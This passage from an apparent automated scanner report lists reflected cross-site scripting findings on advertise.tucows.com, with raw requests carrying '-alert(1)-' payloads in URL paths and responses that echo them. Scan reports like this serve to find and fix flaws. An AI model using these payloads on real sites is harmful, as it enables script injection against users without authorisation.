Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /includes/corpbar/cb3.0/css/style.css471ee"-alert(1)-"f64e6d809a6 HTTP/1.1 Host: advertise.tucows.com Proxy-Connection: keep-alive Referer: http://advertise.tucows.com/?41f20%22-alert(1)-%22c17f4a73141=1 Accept: text/css,*/*;q=0.1 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: __utma=163973946.1641024450.1296766282.1296766282.1296766282.1; __utmz=163973946.1296766282.1.1.utmccn=(referral)|utmcsr=burp|utmcct=/show/10|utmcmd=referral; PHPSESSID=2a19ddf330d96d5496a9e6d3718b536d; 2a19ddf330d96d5496a9e6d3718b536d=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D
Response
HTTP/1.0 404 Not Found Date: Fri, 04 Feb 2011 17:57:07 GMT Server: Apache/2.2.14 (Ubuntu) PHP/5.3.2-1ubuntu4.2 with Suhosin-Patch mod_ssl/2.2.14 OpenSSL/0.9.8k X-Powered-By: PHP/5.3.2-1ubuntu4.2 Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Set-Cookie: 2a19ddf330d96d5496a9e6d3718b536d=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D; path=/ Vary: Accept-Encoding Connection: close Content-Type: text/html Content-Length: 32379
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <title> Page Not Found</tit ...[SNIP]... <script> loggedIn = false;
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload a6d10"-alert(1)-"e562c2cd8f4 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /includesa6d10"-alert(1)-"e562c2cd8f4/js/aalib.js HTTP/1.1 Host: advertise.tucows.com Proxy-Connection: keep-alive Referer: http://advertise.tucows.com/?41f20%22-alert(1)-%22c17f4a73141=1 Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: __utma=163973946.1641024450.1296766282.1296766282.1296766282.1; __utmz=163973946.1296766282.1.1.utmccn=(referral)|utmcsr=burp|utmcct=/show/10|utmcmd=referral; PHPSESSID=2a19ddf330d96d5496a9e6d3718b536d; 2a19ddf330d96d5496a9e6d3718b536d=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D
Response
HTTP/1.0 404 Not Found Date: Fri, 04 Feb 2011 17:56:24 GMT Server: Apache/2.2.14 (Ubuntu) PHP/5.3.2-1ubuntu4.2 with Suhosin-Patch mod_ssl/2.2.14 OpenSSL/0.9.8k X-Powered-By: PHP/5.3.2-1ubuntu4.2 Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Set-Cookie: 2a19ddf330d96d5496a9e6d3718b536d=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D; path=/ Vary: Accept-Encoding Connection: close Content-Type: text/html Content-Length: 32531
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <title> Page Not Found</tit ...[SNIP]... <script> loggedIn = false;
The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 33f2c"-alert(1)-"78bef03947c was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /includes/js33f2c"-alert(1)-"78bef03947c/aalib.js HTTP/1.1 Host: advertise.tucows.com Proxy-Connection: keep-alive Referer: http://advertise.tucows.com/?41f20%22-alert(1)-%22c17f4a73141=1 Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: __utma=163973946.1641024450.1296766282.1296766282.1296766282.1; __utmz=163973946.1296766282.1.1.utmccn=(referral)|utmcsr=burp|utmcct=/show/10|utmcmd=referral; PHPSESSID=2a19ddf330d96d5496a9e6d3718b536d; 2a19ddf330d96d5496a9e6d3718b536d=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D
Response
HTTP/1.0 404 Not Found Date: Fri, 04 Feb 2011 17:56:36 GMT Server: Apache/2.2.14 (Ubuntu) PHP/5.3.2-1ubuntu4.2 with Suhosin-Patch mod_ssl/2.2.14 OpenSSL/0.9.8k X-Powered-By: PHP/5.3.2-1ubuntu4.2 Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Set-Cookie: 2a19ddf330d96d5496a9e6d3718b536d=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D; path=/ Vary: Accept-Encoding Connection: close Content-Type: text/html Content-Length: 32531
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <title> Page Not Found</tit ...[SNIP]... <script> loggedIn = false;
The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 22f00"-alert(1)-"b89799debf7 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /includes/js/aalib.js22f00"-alert(1)-"b89799debf7 HTTP/1.1
Host: advertise.tucows.com
Proxy-Connection: keep-alive
Referer: http://advertise.tucows.com/?41f20%22-alert(1)-%22c17f4a73141=1
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utma=163973946.1641024450.1296766282.1296766282.1296766282.1; __utmz=163973946.1296766282.1.1.utmccn=(referral)|utmcsr=burp|utmcct=/show/10|utmcmd=referral; PHPSESSID=2a19ddf330d96d5496a9e6d3718b536d; 2a19ddf330d96d5496a9e6d3718b536d=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D
Response
HTTP/1.0 404 Not Found
Date: Fri, 04 Feb 2011 17:56:52 GMT
Server: Apache/2.2.14 (Ubuntu) PHP/5.3.2-1ubuntu4.2 with Suhosin-Patch mod_ssl/2.2.14 OpenSSL/0.9.8k
X-Powered-By: PHP/5.3.2-1ubuntu4.2
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: 2a19ddf330d96d5496a9e6d3718b536d=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D; path=/
Vary: Accept-Encoding
Connection: close
Content-Type: text/html
Content-Length: 32624
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <title> Page Not Found</tit ...[SNIP]... <script> loggedIn = false;
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload dffd4"-alert(1)-"6bee40325ed was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /includesdffd4"-alert(1)-"6bee40325ed/js/ajaxlib.js HTTP/1.1
Host: advertise.tucows.com
Proxy-Connection: keep-alive
Referer: http://advertise.tucows.com/?41f20%22-alert(1)-%22c17f4a73141=1
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utma=163973946.1641024450.1296766282.1296766282.1296766282.1; __utmz=163973946.1296766282.1.1.utmccn=(referral)|utmcsr=burp|utmcct=/show/10|utmcmd=referral; PHPSESSID=2a19ddf330d96d5496a9e6d3718b536d; 2a19ddf330d96d5496a9e6d3718b536d=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D
Response
HTTP/1.0 404 Not Found
Date: Fri, 04 Feb 2011 17:56:19 GMT
Server: Apache/2.2.14 (Ubuntu) PHP/5.3.2-1ubuntu4.2 with Suhosin-Patch mod_ssl/2.2.14 OpenSSL/0.9.8k
X-Powered-By: PHP/5.3.2-1ubuntu4.2
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: 2a19ddf330d96d5496a9e6d3718b536d=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D; path=/
Vary: Accept-Encoding
Connection: close
Content-Type: text/html
Content-Length: 31802
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <title> Page Not Found</tit ...[SNIP]... <script> loggedIn = false;
The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 78547"-alert(1)-"ce4057ee76f was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /includes/js78547"-alert(1)-"ce4057ee76f/ajaxlib.js HTTP/1.1
Host: advertise.tucows.com
Proxy-Connection: keep-alive
Referer: http://advertise.tucows.com/?41f20%22-alert(1)-%22c17f4a73141=1
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utma=163973946.1641024450.1296766282.1296766282.1296766282.1; __utmz=163973946.1296766282.1.1.utmccn=(referral)|utmcsr=burp|utmcct=/show/10|utmcmd=referral; PHPSESSID=2a19ddf330d96d5496a9e6d3718b536d; 2a19ddf330d96d5496a9e6d3718b536d=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D
Response
HTTP/1.0 404 Not Found
Date: Fri, 04 Feb 2011 17:56:24 GMT
Server: Apache/2.2.14 (Ubuntu) PHP/5.3.2-1ubuntu4.2 with Suhosin-Patch mod_ssl/2.2.14 OpenSSL/0.9.8k
X-Powered-By: PHP/5.3.2-1ubuntu4.2
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: 2a19ddf330d96d5496a9e6d3718b536d=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D; path=/
Vary: Accept-Encoding
Connection: close
Content-Type: text/html
Content-Length: 32478
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <title> Page Not Found</tit ...[SNIP]... <script> loggedIn = false;
The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 46a92"-alert(1)-"496766b8176 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /includes/js/ajaxlib.js46a92"-alert(1)-"496766b8176 HTTP/1.1
Host: advertise.tucows.com
Proxy-Connection: keep-alive
Referer: http://advertise.tucows.com/?41f20%22-alert(1)-%22c17f4a73141=1
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utma=163973946.1641024450.1296766282.1296766282.1296766282.1; __utmz=163973946.1296766282.1.1.utmccn=(referral)|utmcsr=burp|utmcct=/show/10|utmcmd=referral; PHPSESSID=2a19ddf330d96d5496a9e6d3718b536d; 2a19ddf330d96d5496a9e6d3718b536d=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D
Response
HTTP/1.0 404 Not Found
Date: Fri, 04 Feb 2011 17:56:38 GMT
Server: Apache/2.2.14 (Ubuntu) PHP/5.3.2-1ubuntu4.2 with Suhosin-Patch mod_ssl/2.2.14 OpenSSL/0.9.8k
X-Powered-By: PHP/5.3.2-1ubuntu4.2
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: 2a19ddf330d96d5496a9e6d3718b536d=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D; path=/
Vary: Accept-Encoding
Connection: close
Content-Type: text/html
Content-Length: 31809
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <title> Page Not Found</tit ...[SNIP]... <script> loggedIn = false;
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 4586a"-alert(1)-"2bd19196b6c was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /includes4586a"-alert(1)-"2bd19196b6c/js/show_layer.js HTTP/1.1
Host: advertise.tucows.com
Proxy-Connection: keep-alive
Referer: http://advertise.tucows.com/?41f20%22-alert(1)-%22c17f4a73141=1
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utma=163973946.1641024450.1296766282.1296766282.1296766282.1; __utmz=163973946.1296766282.1.1.utmccn=(referral)|utmcsr=burp|utmcct=/show/10|utmcmd=referral; PHPSESSID=2a19ddf330d96d5496a9e6d3718b536d; 2a19ddf330d96d5496a9e6d3718b536d=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D
Response
HTTP/1.0 404 Not Found
Date: Fri, 04 Feb 2011 17:56:19 GMT
Server: Apache/2.2.14 (Ubuntu) PHP/5.3.2-1ubuntu4.2 with Suhosin-Patch mod_ssl/2.2.14 OpenSSL/0.9.8k
X-Powered-By: PHP/5.3.2-1ubuntu4.2
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: 2a19ddf330d96d5496a9e6d3718b536d=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D; path=/
Vary: Accept-Encoding
Connection: close
Content-Type: text/html
Content-Length: 32419
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <title> Page Not Found</tit ...[SNIP]... <script> loggedIn = false;
The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 5ac19"-alert(1)-"1250877226f was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /includes/js5ac19"-alert(1)-"1250877226f/show_layer.js HTTP/1.1
Host: advertise.tucows.com
Proxy-Connection: keep-alive
Referer: http://advertise.tucows.com/?41f20%22-alert(1)-%22c17f4a73141=1
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utma=163973946.1641024450.1296766282.1296766282.1296766282.1; __utmz=163973946.1296766282.1.1.utmccn=(referral)|utmcsr=burp|utmcct=/show/10|utmcmd=referral; PHPSESSID=2a19ddf330d96d5496a9e6d3718b536d; 2a19ddf330d96d5496a9e6d3718b536d=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D
Response
HTTP/1.0 404 Not Found
Date: Fri, 04 Feb 2011 17:56:24 GMT
Server: Apache/2.2.14 (Ubuntu) PHP/5.3.2-1ubuntu4.2 with Suhosin-Patch mod_ssl/2.2.14 OpenSSL/0.9.8k
X-Powered-By: PHP/5.3.2-1ubuntu4.2
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: 2a19ddf330d96d5496a9e6d3718b536d=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D; path=/
Vary: Accept-Encoding
Connection: close
Content-Type: text/html
Content-Length: 32513
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <title> Page Not Found</tit ...[SNIP]... <script> loggedIn = false;
The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 835b0"-alert(1)-"17c882840e0 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /includes/js/show_layer.js835b0"-alert(1)-"17c882840e0 HTTP/1.1
Host: advertise.tucows.com
Proxy-Connection: keep-alive
Referer: http://advertise.tucows.com/?41f20%22-alert(1)-%22c17f4a73141=1
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utma=163973946.1641024450.1296766282.1296766282.1296766282.1; __utmz=163973946.1296766282.1.1.utmccn=(referral)|utmcsr=burp|utmcct=/show/10|utmcmd=referral; PHPSESSID=2a19ddf330d96d5496a9e6d3718b536d; 2a19ddf330d96d5496a9e6d3718b536d=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D
Response
HTTP/1.0 404 Not Found
Date: Fri, 04 Feb 2011 17:56:38 GMT
Server: Apache/2.2.14 (Ubuntu) PHP/5.3.2-1ubuntu4.2 with Suhosin-Patch mod_ssl/2.2.14 OpenSSL/0.9.8k
X-Powered-By: PHP/5.3.2-1ubuntu4.2
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: 2a19ddf330d96d5496a9e6d3718b536d=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D; path=/
Vary: Accept-Encoding
Connection: close
Content-Type: text/html
Content-Length: 31974
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <title> Page Not Found</tit ...[SNIP]... <script> loggedIn = false;
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 624a4"-alert(1)-"3358fadd2b6 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /includes624a4"-alert(1)-"3358fadd2b6/js/signupin.js HTTP/1.1
Host: advertise.tucows.com
Proxy-Connection: keep-alive
Referer: http://advertise.tucows.com/?41f20%22-alert(1)-%22c17f4a73141=1
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utma=163973946.1641024450.1296766282.1296766282.1296766282.1; __utmz=163973946.1296766282.1.1.utmccn=(referral)|utmcsr=burp|utmcct=/show/10|utmcmd=referral; PHPSESSID=2a19ddf330d96d5496a9e6d3718b536d; 2a19ddf330d96d5496a9e6d3718b536d=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D
Response
HTTP/1.0 404 Not Found
Date: Fri, 04 Feb 2011 17:56:21 GMT
Server: Apache/2.2.14 (Ubuntu) PHP/5.3.2-1ubuntu4.2 with Suhosin-Patch mod_ssl/2.2.14 OpenSSL/0.9.8k
X-Powered-By: PHP/5.3.2-1ubuntu4.2
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: 2a19ddf330d96d5496a9e6d3718b536d=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D; path=/
Vary: Accept-Encoding
Connection: close
Content-Type: text/html
Content-Length: 32213
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <title> Page Not Found</tit ...[SNIP]... <script> loggedIn = false;
The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload b36c3"-alert(1)-"b205bb5d532 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
